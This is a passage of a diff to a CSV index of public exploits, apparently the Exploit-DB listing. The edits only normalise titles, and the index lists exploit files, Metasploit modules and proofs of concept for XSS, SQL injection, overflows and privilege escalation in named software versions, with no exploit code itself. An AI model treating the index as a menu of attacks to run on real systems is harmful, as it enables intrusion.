Service Vulnerability",2004-08-25,"Next Generation Security",windows,local,0 24412,platforms/windows/dos/24412.c,"RealVNC Server 4.0 Remote Denial of Service Vulnerability",2004-08-25,Uz4yh4N,windows,dos,0 24413,platforms/windows/remote/24413.txt,"NullSoft Winamp 2-5 .WSZ File Remote Code Execution Vulnerability",2004-07-26,Anonymous,windows,remote,0 -24414,platforms/multiple/remote/24414.txt,"Keene Digital Media Server 1.0.2 Directory Traversal Variant Vulnerability",2004-08-26,"GulfTech Security",multiple,remote,0 +24414,platforms/multiple/remote/24414.txt,"keene digital media server 1.0.2 - Directory Traversal variant vulnerability",2004-08-26,"GulfTech Security",multiple,remote,0 24415,platforms/php/webapps/24415.txt,"Nagl XOOPS Dictionary Module 1.0 Multiple Cross-Site Vulnerabilities",2004-08-28,CyruxNET,php,webapps,0 24416,platforms/windows/remote/24416.txt,"Ipswitch WS_FTP Server 5.0.x CD Command Malformed File Path Remote Denial of Service Vulnerability",2004-08-30,lion,windows,remote,0 24417,platforms/windows/remote/24417.txt,"Xedus Web Server 1.0 test.x username Parameter XSS",2004-09-30,"James Bercegay",windows,remote,0 @@ -21606,7 +21604,7 @@ id,file,description,date,author,platform,type,port 24425,platforms/php/webapps/24425.txt,"phpWebsite 0.7.3/0.8.x/0.9.x Comment Module CM_pid XSS",2004-09-01,"GulfTech Security",php,webapps,0 24426,platforms/windows/dos/24426.html,"Opera Web Browser 7.23 Empty Embedded Object JavaScript Denial Of Service Vulnerability",2004-09-01,Stevo,windows,dos,0 24432,platforms/windows/webapps/24432.txt,"Internet Explorer 8 & Internet Explorer 9 - Steal any Cookie",2013-01-28,"Christian Haider",windows,webapps,0 -24433,platforms/php/webapps/24433.txt,"PHP Weby Directory Software 1.2 Multiple Vulnerabilities",2013-01-28,AkaStep,php,webapps,0 +24433,platforms/php/webapps/24433.txt,"php weby directory software 1.2 - Multiple Vulnerabilities",2013-01-28,AkaStep,php,webapps,0 24434,platforms/multiple/remote/24434.rb,"Ruby on Rails JSON Processor YAML Deserialization Code Execution",2013-01-29,metasploit,multiple,remote,0 24435,platforms/hardware/webapps/24435.txt,"Fortinet FortiMail 400 IBE Multiple Vulnerabilities",2013-01-29,Vulnerability-Lab,hardware,webapps,0 24436,platforms/php/webapps/24436.txt,"Kohana Framework 2.3.3 - Directory Traversal Vulnerability",2013-01-29,Vulnerability-Lab,php,webapps,0 @@ -21621,12 +21619,12 @@ id,file,description,date,author,platform,type,port 24448,platforms/windows/dos/24448.svg,"Opera SVG Use After Free Vulnerability",2013-02-05,Cons0ul,windows,dos,0 24449,platforms/jsp/webapps/24449.txt,"Cisco Unity Express Multiple Vulnerabilities",2013-02-05,"Jacob Holcomb",jsp,webapps,0 24450,platforms/freebsd/dos/24450.txt,"FreeBSD 9.1 ftpd Remote Denial of Service",2013-02-05,"Maksymilian Arciemowicz",freebsd,dos,0 -24451,platforms/php/webapps/24451.txt,"ArrowChat 1.5.61 Multiple Vulnerabilities",2013-02-05,kallimero,php,webapps,0 +24451,platforms/php/webapps/24451.txt,"ArrowChat 1.5.61 - Multiple Vulnerabilities",2013-02-05,kallimero,php,webapps,0 24452,platforms/php/webapps/24452.txt,"AdaptCMS 2.0.4 (config.php, question parameter) SQL Injection Vulnerability",2013-02-05,kallimero,php,webapps,0 24453,platforms/hardware/webapps/24453.txt,"D-Link DIR-600 and DIR-300 (rev B) Multiple Vulnerabilities",2013-02-05,m-1-k-3,hardware,webapps,0 24454,platforms/php/webapps/24454.txt,"Free Monthly Websites 2.0 - Multiple Vulnerabilities",2013-02-05,X-Cisadane,php,webapps,0 24455,platforms/unix/remote/24455.rb,"Portable UPnP SDK unique_service_name() Remote Code Execution",2013-02-05,metasploit,unix,remote,0 -24456,platforms/php/webapps/24456.txt,"Glossword 1.8.12 Multiple Vulnerabilities",2013-02-05,AkaStep,php,webapps,0 +24456,platforms/php/webapps/24456.txt,"glossword 1.8.12 - Multiple Vulnerabilities",2013-02-05,AkaStep,php,webapps,0 24457,platforms/php/webapps/24457.txt,"Glossword 1.8.3 SQL Injection Vulnerability",2013-02-05,AkaStep,php,webapps,0 24458,platforms/linux/local/24458.txt,"Oracle Automated Service Manager 1.3 Installation Local Privilege Escalation",2013-02-05,"Larry W. Cashdollar",linux,local,0 24459,platforms/linux/dos/24459.sh,"Linux Kernel /dev/ptmx Key Stroke Timing Local Disclosure",2013-02-05,vladz,linux,dos,0 @@ -21713,7 +21711,7 @@ id,file,description,date,author,platform,type,port 24561,platforms/php/webapps/24561.txt,"Piwigo 2.4.6 - Multiple Vulnerabilities",2013-03-01,"High-Tech Bridge SA",php,webapps,0 24562,platforms/php/webapps/24562.txt,"PHP-Fusion 7.02.05 - Multiple Vulnerabilities",2013-03-01,waraxe,php,webapps,0 24563,platforms/hardware/webapps/24563.txt,"D-Link DSL-2740B (ADSL Router) Authentication Bypass",2013-03-04,"Ivano Binetti",hardware,webapps,0 -24564,platforms/php/webapps/24564.txt,"Nconf v 1.3 multiple Sql Injection",2013-03-04,"Saadi Siddiqui",php,webapps,0 +24564,platforms/php/webapps/24564.txt,"Nconf 1.3 - Multiple SQL Injection",2013-03-04,"Saadi Siddiqui",php,webapps,0 24565,platforms/php/webapps/24565.txt,"SiteCubed MailWorks Professional Authentication Bypass Vulnerability",2004-09-02,"Paul Craig",php,webapps,0 24566,platforms/php/webapps/24566.txt,"CuteNews 0.88/1.3.x 'index.php' Cross-Site Scripting Vulnerability",2004-09-02,Exoduks,php,webapps,0 24567,platforms/multiple/remote/24567.txt,"Oracle Database Server 8.1.7/9.0.x ctxsys.driload Access Validation Vulnerability",2004-09-03,"Alexander Kornbrust",multiple,remote,0 @@ -21748,7 +21746,7 @@ id,file,description,date,author,platform,type,port 24597,platforms/multiple/dos/24597.txt,"Mozilla Browser 1.7.x Non-ASCII Hostname Heap Overflow Vulnerability",2004-09-14,"Mats Palmgren and Gael Delalleau",multiple,dos,0 24598,platforms/multiple/remote/24598.txt,"SnipSnap 0.5.2 HTTP Response Splitting Vulnerability",2004-09-14,"Maestro De-Seguridad",multiple,remote,0 24599,platforms/linux/dos/24599.txt,"CUPS 1.1.x UDP Packet Remote Denial Of Service Vulnerability",2004-09-15,"Alvaro Martinez Echevarria",linux,dos,0 -24600,platforms/windows/remote/24600.txt,"MyServer 0.7 Directory Traversal Vulnerability",2004-09-15,scrap,windows,remote,0 +24600,platforms/windows/remote/24600.txt,"myserver 0.7 - Directory Traversal vulnerability",2004-09-15,scrap,windows,remote,0 24601,platforms/php/webapps/24601.txt,"BBS E-Market Professional bf_130 (1.3.0) - Multiple File Disclosure Vulnerabilities",2004-09-15,"Jeong Jin-Seok",php,webapps,0 24603,platforms/hardware/webapps/24603.txt,"Remote File Manager 1.2 iOS - Multiple Vulnerabilities",2013-03-06,Vulnerability-Lab,hardware,webapps,0 24604,platforms/asp/webapps/24604.txt,"Snitz Forums 2000 Down.ASP HTTP Response Splitting Vulnerability",2004-09-16,"Maestro De-Seguridad",asp,webapps,0 @@ -21793,7 +21791,7 @@ id,file,description,date,author,platform,type,port 24644,platforms/php/webapps/24644.txt,"WordPress 1.2 categories.php cat_ID Parameter XSS",2004-09-28,"Thomas Waldegger",php,webapps,0 24645,platforms/php/webapps/24645.txt,"WordPress 1.2 edit.php s Parameter XSS",2004-09-28,"Thomas Waldegger",php,webapps,0 24646,platforms/php/webapps/24646.txt,"WordPress 1.2 edit-comments.php Multiple Parameter XSS",2004-09-28,"Thomas Waldegger",php,webapps,0 -24647,platforms/php/webapps/24647.txt,"ParaChat 5.5 Directory Traversal Vulnerability",2004-09-28,"Donato Ferrante",php,webapps,0 +24647,platforms/php/webapps/24647.txt,"parachat 5.5 - Directory Traversal vulnerability",2004-09-28,"Donato Ferrante",php,webapps,0 24648,platforms/php/webapps/24648.txt,"W-Agora 4.1.6 a redir_url.php key Parameter SQL Injection",2004-09-30,"Alexander Antipov",php,webapps,0 24649,platforms/php/webapps/24649.txt,"W-Agora 4.1.6 a forgot_password.php userid Parameter XSS",2004-09-30,"Alexander Antipov",php,webapps,0 24650,platforms/php/webapps/24650.txt,"W-Agora 4.1.6 a download_thread.php thread Parameter XSS",2004-09-30,"Alexander Antipov",php,webapps,0 @@ -21823,7 +21821,7 @@ id,file,description,date,author,platform,type,port 24674,platforms/asp/webapps/24674.txt,"DUforum 3.x messages.asp FOR_ID Parameter SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0 24675,platforms/asp/webapps/24675.txt,"DUforum 3.x messageDetail.asp MSG_ID Parameter SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0 24676,platforms/php/webapps/24676.txt,"SCT Campus Pipeline 1.0/2.x/3.x Render.UserLayoutRootNode.uP Cross-Site Scripting Vulnerability",2004-10-13,"Matthew Oyer",php,webapps,0 -24677,platforms/linux/dos/24677.txt,"IBM DB2 DTS To String Conversion Denial Of Service Vulnerability",2004-09-01,"Chris Anley",linux,dos,0 +24677,platforms/linux/dos/24677.txt,"IBM DB2 DTS To String Conversion - Denial Of Service Vulnerability",2004-09-01,"Chris Anley",linux,dos,0 24678,platforms/windows/local/24678.txt,"IBM DB2 Universal Database Information Disclosure Vulnerability",2004-09-01,"Chris Anley",windows,local,0 24679,platforms/windows/dos/24679.txt,"IBM DB2 Semaphore Signaling Denial Of Service Vulnerability",2004-09-01,"Chris Anley",windows,dos,0 24680,platforms/cfm/webapps/24680.txt,"FuseTalk Forum 4.0 Multiple Cross-Site Scripting Vulnerabilities",2004-10-13,steven,cfm,webapps,0 @@ -21834,7 +21832,7 @@ id,file,description,date,author,platform,type,port 24685,platforms/php/webapps/24685.txt,"CoolPHP 1.0 Multiple Remote Input Validation Vulnerabilities",2004-10-16,R00tCr4ck,php,webapps,0 24686,platforms/windows/remote/24686.txt,"Microsoft Outlook 2003 Security Policy Bypass Vulnerability",2004-10-18,http-equiv,windows,remote,0 24687,platforms/windows/remote/24687.txt,"Microsoft Outlook Express 4.x/5.x/6.0 Plaintext Email Security Policy Bypass Vulnerability",2004-10-18,http-equiv,windows,remote,0 -24688,platforms/windows/remote/24688.pl,"Best Software SalesLogix 2000.0 Multiple Remote Vulnerabilities",2004-10-18,"Carl Livitt",windows,remote,0 +24688,platforms/windows/remote/24688.pl,"best software saleslogix 2000.0 Multiple Vulnerabilities",2004-10-18,"Carl Livitt",windows,remote,0 24689,platforms/php/webapps/24689.sh,"cPanel 9.9.1 -R3 Front Page Extension Installation Information Disclosure",2004-10-18,"Karol Wiesek",php,webapps,0 24690,platforms/unix/webapps/24690.txt,"IBM Lotus Domino 6.x Cross-Site Scripting and HTML Injection Vulnerabilities",2004-10-18,"Juan C Calderon",unix,webapps,0 24691,platforms/multiple/dos/24691.txt,"Vypress Tonecast 1.3 Remote Denial Of Service Vulnerability",2004-10-19,"Luigi Auriemma",multiple,dos,0 @@ -21853,7 +21851,7 @@ id,file,description,date,author,platform,type,port 24705,platforms/windows/dos/24705.txt,"Microsoft Internet Explorer 6.0 Font Tag Denial Of Service Vulnerability",2004-10-26,"Jehiah Czebotar",windows,dos,0 24707,platforms/multiple/remote/24707.txt,"Google Desktop Search Remote Cross-Site Scripting Vulnerability",2004-10-26,"Salvatore Aranzulla",multiple,remote,0 24708,platforms/windows/dos/24708.txt,"Quicksilver Master of Orion III 1.2.5 Multiple Remote Denial of Service Vulnerabilities",2004-10-27,"Luigi Auriemma",windows,dos,0 -24710,platforms/multiple/dos/24710.txt,"ID Software Quake II Server 3.2 Multiple Remote Vulnerabilities",2004-10-27,"Richard Stanway",multiple,dos,0 +24710,platforms/multiple/dos/24710.txt,"id software quake ii server 3.2 Multiple Vulnerabilities",2004-10-27,"Richard Stanway",multiple,dos,0 24711,platforms/php/remote/24711.php,"PHP 4.x/5 cURL Open_Basedir Restriction Bypass Vulnerability",2004-10-28,FraMe,php,remote,0 24712,platforms/windows/remote/24712.txt,"Microsoft Internet Explorer 6.0 TABLE Status Bar URI Obfuscation Weakness",2004-10-28,"Benjamin Tobias Franz",windows,remote,0 24713,platforms/multiple/remote/24713.txt,"Global Spy Software Cyber Web Filter 2 IP Filter Bypass Vulnerability",2004-10-29,Anonymous,multiple,remote,0 @@ -21872,8 +21870,8 @@ id,file,description,date,author,platform,type,port 24726,platforms/windows/dos/24726.txt,"Software602 602 LAN Suite Multiple Remote Denial Of Service Vulnerabilities",2004-11-06,"Luigi Auriemma",windows,dos,0 24727,platforms/windows/remote/24727.txt,"Microsoft Internet Explorer 6.0 Local Resource Enumeration Vulnerability",2004-11-08,"Benjamin Tobias Franz",windows,remote,0 24728,platforms/windows/remote/24728.txt,"Internet Explorer 6.0, Firefox 0.x,Netscape 7.x IMG Tag Multiple Vulnerabilities",2004-11-10,"Wolfgang Schwarz",windows,remote,0 -24729,platforms/php/webapps/24729.txt,"WebCalendar 0.9.x Multiple Remote Vulnerabilities",2004-11-10,"Joxean Koret",php,webapps,0 -24730,platforms/multiple/remote/24730.txt,"04WebServer 1.42 Multiple Remote Vulnerabilities",2004-11-10,"Tan Chew Keong",multiple,remote,0 +24729,platforms/php/webapps/24729.txt,"webcalendar 0.9.x Multiple Vulnerabilities",2004-11-10,"Joxean Koret",php,webapps,0 +24730,platforms/multiple/remote/24730.txt,"04webserver 1.42 Multiple Vulnerabilities",2004-11-10,"Tan Chew Keong",multiple,remote,0 24731,platforms/php/webapps/24731.txt,"Aztek Forum 4.0 Multiple Input Validation Vulnerabilities",2004-11-12,"benji lemien",php,webapps,0 24732,platforms/php/webapps/24732.txt,"Phorum 5.0.x FOLLOW.PHP SQL Injection Vulnerability",2004-11-11,"Janek Vind",php,webapps,0 24733,platforms/windows/dos/24733.pl,"SecureAction Research Secure Network Messenger 1.4.x Remote Denial Of Service Vulnerability",2004-11-12,"Luigi Auriemma",windows,dos,0 @@ -21891,17 +21889,17 @@ id,file,description,date,author,platform,type,port 24745,platforms/windows/remote/24745.rb,"Honeywell HSC Remote Deployer ActiveX Remote Code Execution",2013-03-13,metasploit,windows,remote,0 24746,platforms/lin_x86-64/local/24746.c,"Ubuntu 12.10 64-Bit sock_diag_handlers Local Root Exploit",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0 24747,platforms/linux/dos/24747.c,"Linux Kernel 'SCTP_GET_ASSOC_STATS()' - Stack-Based Buffer Overflow",2013-03-13,"Petr Matousek",linux,dos,0 -24748,platforms/php/webapps/24748.txt,"Event Calendar Multiple Remote Vulnerabilities",2004-11-16,"Janek Vind",php,webapps,0 +24748,platforms/php/webapps/24748.txt,"event calendar Multiple Vulnerabilities",2004-11-16,"Janek Vind",php,webapps,0 24749,platforms/linux/local/24749.sh,"Cscope 13.0/15.x Insecure Temporary File Creation Vulnerabilities (1)",2004-11-17,Gangstuck,linux,local,0 24750,platforms/linux/local/24750.c,"Cscope 13.0/15.x Insecure Temporary File Creation Vulnerabilities (2)",2004-11-17,Gangstuck,linux,local,0 24751,platforms/php/webapps/24751.pl,"PHPBB 2.0.x Admin_cash.PHP Remote PHP File Include Vulnerability",2004-11-17,"Jerome Athias",php,webapps,0 24752,platforms/php/webapps/24752.txt,"Invision Power Board 2.0 Index.PHP Post Action SQL Injection Vulnerability",2004-11-18,Anonymous,php,webapps,0 24753,platforms/windows/local/24753.txt,"Mailtraq 2.x Administration Console Local Privilege Escalation Vulnerability",2004-11-19,"Reed Arvin",windows,local,0 24754,platforms/windows/local/24754.txt,"Altiris Deployment Solution 5.6 Client Service Local Privilege Escalation Vulnerability",2004-11-19,"Reed Arvin",windows,local,0 -24755,platforms/linux/dos/24755.java,"Opera Web Browser 7.54 Java Implementation Multiple Remote Vulnerabilities (1)",2004-11-19,"Marc Schoenefeld",linux,dos,0 -24756,platforms/linux/dos/24756.java,"Opera Web Browser 7.54 Java Implementation Multiple Remote Vulnerabilities (2)",2004-11-19,"Marc Schoenefeld",linux,dos,0 -24757,platforms/linux/local/24757.java,"Opera Web Browser 7.54 Java Implementation Multiple Remote Vulnerabilities (3)",2004-11-19,"Marc Schoenefeld",linux,local,0 -24758,platforms/linux/local/24758.java,"Opera Web Browser 7.54 Java Implementation Multiple Remote Vulnerabilities (4)",2004-11-19,"Marc Schoenefeld",linux,local,0 +24755,platforms/linux/dos/24755.java,"opera web browser 7.54 java implementation Multiple Vulnerabilities (1)",2004-11-19,"Marc Schoenefeld",linux,dos,0 +24756,platforms/linux/dos/24756.java,"opera web browser 7.54 java implementation Multiple Vulnerabilities (2)",2004-11-19,"Marc Schoenefeld",linux,dos,0 +24757,platforms/linux/local/24757.java,"opera web browser 7.54 java implementation Multiple Vulnerabilities (3)",2004-11-19,"Marc Schoenefeld",linux,local,0 +24758,platforms/linux/local/24758.java,"opera web browser 7.54 java implementation Multiple Vulnerabilities (4)",2004-11-19,"Marc Schoenefeld",linux,local,0 24759,platforms/php/webapps/24759.txt,"IPBProArcade 2.5 Remote SQL Injection Vulnerability",2004-11-20,"axl daivy",php,webapps,0 24760,platforms/hardware/remote/24760.txt,"ZyXEL 3 Prestige Router HTTP Remote Administration Configuration Reset Vulnerability",2004-11-22,"Francisco Canela",hardware,remote,0 24761,platforms/multiple/dos/24761.txt,"Gearbox Software Halo Game 1.x Client Remote Denial Of Service Vulnerability",2004-11-22,"Luigi Auriemma",multiple,dos,0 @@ -21919,12 +21917,12 @@ id,file,description,date,author,platform,type,port 24775,platforms/windows/dos/24775.html,"Microsoft Internet Explorer 6.0 Infinite Array Sort Denial Of Service Vulnerability",2004-11-25,"Berend-Jan Wever",windows,dos,0 24776,platforms/windows/dos/24776.html,"Mozilla Firefox 0.8/0.9/0.10 Infinite Array Sort Denial Of Service Vulnerability",2004-11-25,"Berend-Jan Wever",windows,dos,0 24777,platforms/linux/dos/24777.txt,"Linux Kernel 2.4.x/2.6.x Local Denial Of Service And Memory Disclosure Vulnerabilities",2004-11-25,"Florian Heinz",linux,dos,0 -24778,platforms/multiple/dos/24778.html,"Sun Java Applet 1.x Invocation Version Specification Weakness",2004-11-25,"Peter Greenwood",multiple,dos,0 +24778,platforms/multiple/dos/24778.html,"Sun Java Applet 1.x - Invocation Version Specification Weakness",2004-11-25,"Peter Greenwood",multiple,dos,0 24779,platforms/cgi/webapps/24779.txt,"InShop and InMail Cross-Site Scripting Vulnerabilities",2004-11-25,"Carlos Ulver",cgi,webapps,0 24780,platforms/osx/dos/24780.html,"Apple Safari Web Browser 1.x Infinite Array Sort Denial Of Service Vulnerability",2004-11-25,"Berend-Jan Wever",osx,dos,0 24781,platforms/multiple/dos/24781.html,"Mozilla Camino Web Browser 0.7/0.8 Infinite Array Sort Denial Of Service Vulnerability",2004-11-25,"Berend-Jan Wever",multiple,dos,0 24782,platforms/php/webapps/24782.txt,"PHPCMS 1.1/1.2 Cross-Site Scripting Vulnerability",2004-11-26,"Cyrille Barthelemy",php,webapps,0 -24783,platforms/php/webapps/24783.txt,"PNTresMailer 6.0 Directory Traversal Vulnerability",2004-11-26,"John Cobb",php,webapps,0 +24783,platforms/php/webapps/24783.txt,"pntresmailer 6.0 - Directory Traversal vulnerability",2004-11-26,"John Cobb",php,webapps,0 24784,platforms/linux/remote/24784.txt,"File ELF 4.x Header Unspecified Buffer Overflow Vulnerability",2004-11-29,Anonymous,linux,remote,0 24786,platforms/jsp/webapps/24786.txt,"Cisco Video Surveillance Operations Manager 6.3.2 - Multiple vulnerabilities",2013-03-15,Bassem,jsp,webapps,0 24788,platforms/windows/dos/24788.py,"Nitro Pro 8.0.3.1 - Crash PoC",2013-03-15,"John Cobb",windows,dos,0 @@ -21945,14 +21943,14 @@ id,file,description,date,author,platform,type,port 24803,platforms/php/webapps/24803.txt,"Blog Torrent 0.80 BTDownload.PHP Cross-Site Scripting Vulnerability",2004-12-07,Lostmon,php,webapps,0 24804,platforms/linux/dos/24804.c,"Linux Kernel 2.6.x AIO_Free_Ring Local Denial Of Service Vulnerability",2004-12-07,"Darrick J. Wong",linux,dos,0 24805,platforms/multiple/dos/24805.txt,"MySQL MaxDB 7.5 WAHTTP Server Remote Denial Of Service Vulnerability",2004-12-07,"Evgeny Demidov",multiple,dos,0 -24806,platforms/php/webapps/24806.txt,"Darryl Burgdorf WebLibs 1.0 Directory Traversal Vulnerability",2004-12-07,"John Bissell",php,webapps,0 +24806,platforms/php/webapps/24806.txt,"darryl burgdorf weblibs 1.0 - Directory Traversal vulnerability",2004-12-07,"John Bissell",php,webapps,0 24807,platforms/multiple/dos/24807.txt,"MD5 Message Digest Algorithm Hash Collision Weakness",2004-12-07,"Dan Kaminsky",multiple,dos,0 24808,platforms/windows/remote/24808.txt,"Microsoft Internet Explorer 6.0 Search Pane URI Obfuscation Vulnerability",2004-12-08,http-equiv,windows,remote,0 24809,platforms/multiple/dos/24809.txt,"Kerio Personal Firewall 2.1.x/4.x Local Denial Of Service Vulnerability",2004-12-08,cesaro,multiple,dos,0 24810,platforms/php/webapps/24810.txt,"PhpGedView 2.x Descendancy.PHP Cross-Site Scripting Vulnerability",2004-01-19,JeiAr,php,webapps,0 24811,platforms/windows/remote/24811.txt,"F-Secure Policy Manager 5.11 FSMSH.DLL CGI Application Installation Path Disclosure Vulnerability",2004-12-09,oliver@greyhat.de,windows,remote,0 24812,platforms/windows/dos/24812.py,"aktiv-player 2.9.0 - Crash PoC",2013-03-15,metacom,windows,dos,0 -24813,platforms/linux/remote/24813.pl,"GNU WGet 1.x Multiple Remote Vulnerabilities",2004-12-10,"Jan Minar",linux,remote,0 +24813,platforms/linux/remote/24813.pl,"gnu wget 1.x Multiple Vulnerabilities",2004-12-10,"Jan Minar",linux,remote,0 24814,platforms/php/webapps/24814.txt,"PhpGedView 2.5/2.6 Index.PHP Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 24815,platforms/linux/dos/24815.txt,"Gamespy Software Development Kit CD-Key Validation Buffer Overflow Vulnerability",2004-12-10,"Luigi Auriemma",linux,dos,0 24816,platforms/php/webapps/24816.txt,"PhpGedView 2.5/2.6 Individual.PHP Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 @@ -21962,7 +21960,7 @@ id,file,description,date,author,platform,type,port 24820,platforms/php/webapps/24820.txt,"PhpGedView 2.5/2.6 Imageview.PHP Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 24821,platforms/php/webapps/24821.txt,"PhpGedView 2.5/2.6 Gedrecord.PHP Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 24822,platforms/php/webapps/24822.txt,"PhpGedView 2.5/2.6 Gdbi_interface.PHP Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 -24823,platforms/php/webapps/24823.txt,"SugarSales 1.x/2.0 Multiple Remote Vulnerabilities",2004-12-13,"Daniel Fabian",php,webapps,0 +24823,platforms/php/webapps/24823.txt,"sugarsales 1.x/2.0 Multiple Vulnerabilities",2004-12-13,"Daniel Fabian",php,webapps,0 24824,platforms/php/webapps/24824.txt,"UBBCentral UBB.threads 6.2.3/6.5 showflat.php Cat Parameter XSS",2004-12-13,"dw. and ms.",php,webapps,0 24825,platforms/php/webapps/24825.txt,"UBBCentral UBB.threads 6.2.3/6.5 calendar.php Cat Parameter XSS",2004-12-13,"dw. and ms.",php,webapps,0 24826,platforms/php/webapps/24826.txt,"UBBCentral UBB.threads 6.2.3/6.5 login.php Cat Parameter XSS",2004-12-13,"dw. and ms.",php,webapps,0 @@ -22020,7 +22018,7 @@ id,file,description,date,author,platform,type,port 24880,platforms/windows/dos/24880.pl,"IconCool MP3 WAV Converter 3.00 Build 120518 - Stack Buffer Overflow Vulnerability",2013-03-25,G0li47h,windows,dos,0 24881,platforms/php/webapps/24881.txt,"ClipShare 4.1.1 (gmembers.php, gid param) - Blind SQL Injection Vulnerability",2013-03-25,Esac,php,webapps,0 24882,platforms/php/webapps/24882.pl,"vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection",2013-03-25,"Orestis Kourides",php,webapps,0 -24883,platforms/php/webapps/24883.rb,"""Ra1NX"" PHP Bot pubcall Authentication Bypass Remote Code Execution",2013-03-25,bwall,php,webapps,0 +24883,platforms/php/webapps/24883.rb,"Ra1NX PHP Bot - pubcall Authentication Bypass Remote Code Execution",2013-03-25,bwall,php,webapps,0 24884,platforms/windows/local/24884.html,"LiquidXML Studio 2012 ActiveX Insecure Method Executable File Creation 0day",2013-03-25,Dr_IDE,windows,local,0 24885,platforms/windows/local/24885.html,"LiquidXML Studio 2010 ActiveX Remote 0day",2013-03-25,Dr_IDE,windows,local,0 24886,platforms/windows/remote/24886.html,"Mitsubishi MX ActiveX Component 3 - (ActUWzd.dll (WzTitle)) - Remote Exploit",2013-03-25,Dr_IDE,windows,remote,0 @@ -22040,7 +22038,7 @@ id,file,description,date,author,platform,type,port 24902,platforms/php/remote/24902.rb,"STUNSHELL Web Shell Remote PHP Code Execution",2013-03-29,metasploit,php,remote,0 24903,platforms/php/remote/24903.rb,"STUNSHELL Web Shell Remote Code Execution",2013-03-29,metasploit,php,remote,0 24904,platforms/windows/remote/24904.rb,"Java CMM Remote Code Execution",2013-03-29,metasploit,windows,remote,0 -24905,platforms/multiple/remote/24905.rb,"v0pCr3w Web Shell Remote Code Execution",2013-03-29,metasploit,multiple,remote,0 +24905,platforms/multiple/remote/24905.rb,"v0pCr3w Web Shell - Remote Code Execution",2013-03-29,metasploit,multiple,remote,0 24906,platforms/php/webapps/24906.txt,"AWS XMS 2.5 (importer.php, what param) - Directory Traversal Vulnerability",2013-03-29,"High-Tech Bridge SA",php,webapps,0 24907,platforms/windows/remote/24907.txt,"McAfee Virtual Technician (MVT) 6.5.0.2101 - Insecure ActiveX Method",2013-03-29,"High-Tech Bridge SA",windows,remote,0 24910,platforms/windows/local/24910.txt,"VirtualDJ Pro/Home <= 7.3 - Buffer Overflow Vulnerability",2013-04-02,"Alexandro Sánchez Bach",windows,local,0 @@ -22088,7 +22086,7 @@ id,file,description,date,author,platform,type,port 24959,platforms/php/webapps/24959.txt,"CMSLogik 1.2.1 - Multiple Vulnerabilities",2013-04-15,LiquidWorm,php,webapps,0 24960,platforms/php/webapps/24960.txt,"phpVMS Virtual Airline Administration 2.1.934 & 2.1.935 - SQL Injection Vulnerability",2013-04-15,NoGe,php,webapps,0 24961,platforms/windows/remote/24961.html,"FirePHP Firefox Plugin 0.7.1 - Remote Command Execution",2013-04-17,Wireghoul,windows,remote,0 -24962,platforms/windows/dos/24962.txt,"Foxit Reader 5.4.3.* - 5.4.5.0124 - PDF XREF Parsing Denial of Service Vulnerability",2013-04-18,FuzzMyApp,windows,dos,0 +24962,platforms/windows/dos/24962.txt,"Foxit Reader 5.4.3.x - 5.4.5.0124 - PDF XREF Parsing Denial of Service Vulnerability",2013-04-18,FuzzMyApp,windows,dos,0 24963,platforms/multiple/remote/24963.rb,"SAP ConfigServlet OS Command Execution",2013-04-18,"Andras Kabai",multiple,remote,50000 24964,platforms/windows/webapps/24964.txt,"Oracle WebCenter Sites Satellite Server - HTTP Header Injection",2013-04-18,"SEC Consult",windows,webapps,0 24965,platforms/php/webapps/24965.txt,"KrisonAV CMS 3.0.1 - Multiple Vulnerabilities",2013-04-18,"High-Tech Bridge SA",php,webapps,0 @@ -22132,7 +22130,7 @@ id,file,description,date,author,platform,type,port 25008,platforms/linux/remote/25008.txt,"LinPopUp 1.2 Remote Buffer Overflow Vulnerability",2004-12-15,"Stephen Dranger",linux,remote,0 25009,platforms/windows/remote/25009.txt,"Gadu-Gadu 6.0 URL Parser Javascript XSS",2004-12-17,"Jaroslaw Sajko",windows,remote,0 25010,platforms/linux/remote/25010.txt,"O3Read 0.0.3 HTML Parser Buffer Overflow Vulnerability",2004-12-17,"Wiktor Kopec",linux,remote,0 -25011,platforms/multiple/remote/25011.txt,"HTML2HDML 1.0.3 File Conversion Buffer Overflow Vulnerability",2004-12-15,"Matthew Dabrowski",multiple,remote,0 +25011,platforms/multiple/remote/25011.txt,"HTML2HDML 1.0.3 - File Conversion Buffer Overflow Vulnerability",2004-12-15,"Matthew Dabrowski",multiple,remote,0 25012,platforms/windows/dos/25012.c,"Easy Software Products LPPassWd 1.1.22 Resource Limit Denial Of Service Vulnerability",2004-12-11,"Bartlomiej Sieka",windows,dos,0 25013,platforms/windows/remote/25013.txt,"Interactive Studio GamePort 3.0/3.1/4.0 Arbitrary application execution",2004-12-17,"amoXi & Dr.vaXin",windows,remote,0 25014,platforms/php/webapps/25014.txt,"WorkBoard 1.2 Multiple Cross-Site Scripting Vulnerabilities",2004-12-17,Lostmon,php,webapps,0 @@ -22151,7 +22149,7 @@ id,file,description,date,author,platform,type,port 25027,platforms/windows/remote/25027.txt,"abctab2ps 1.6.3 Write_Heading Function ABC File Remote Buffer Overflow Vulnerability",2004-12-15,"Limin Wang",windows,remote,0 25028,platforms/multiple/remote/25028.txt,"CSV2XML 0.5.1 - Buffer Overflow Vulnerability",2004-12-15,"Limin Wang",multiple,remote,0 25029,platforms/windows/remote/25029.txt,"abctab2ps 1.6.3 Trim_Title Function ABC File Remote Buffer Overflow Vulnerability",2004-12-15,"Limin Wang",windows,remote,0 -25030,platforms/linux/remote/25030.txt,"GNU UnRTF 0.19.3 Font Table Conversion Buffer Overflow Vulnerability",2004-12-15,"Yosef Klein",linux,remote,0 +25030,platforms/linux/remote/25030.txt,"GNU UnRTF 0.19.3 - Font Table Conversion Buffer Overflow Vulnerability",2004-12-15,"Yosef Klein",linux,remote,0 25031,platforms/windows/remote/25031.html,"Windows Media Player 9.0 ActiveX Control Media File Attribute Corruption Weakness",2004-12-18,"Arman Nayyeri",windows,remote,0 25032,platforms/windows/remote/25032.html,"Windows Media Player 9.0 ActiveX Control File Enumeration Weakness",2004-12-18,"Arman Nayyeri",windows,remote,0 